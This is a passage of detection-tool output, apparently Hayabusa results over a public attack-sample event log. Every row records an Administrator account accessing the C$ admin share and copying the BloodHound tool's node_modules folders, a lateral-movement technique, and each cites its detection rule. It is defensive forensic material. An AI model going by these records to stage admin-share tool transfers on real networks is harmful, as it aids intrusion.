+2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32\types | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\data | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\order | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\position | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\rank | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\node_modules\lodash | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\class | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\events | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\query | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\style | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\transition | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\util | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dot-prop | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\duplexer2 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\electron-store | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\env-paths | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\eventemitter2 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\eventemitter2\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\exenv | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\exit-on-epipe | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\file-type | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\find-up | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fontfaceobserver | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fontfaceobserver\src | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\frac | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fs.realpath | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.658 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\glob | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.658 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graceful-fs | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib\alg | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib\data | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\node_modules\lodash | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\hyphenate-style-name | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\hyphenate-style-name\.nyc_output | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\lib\types | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-type | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\imurmurhash | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inflight | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
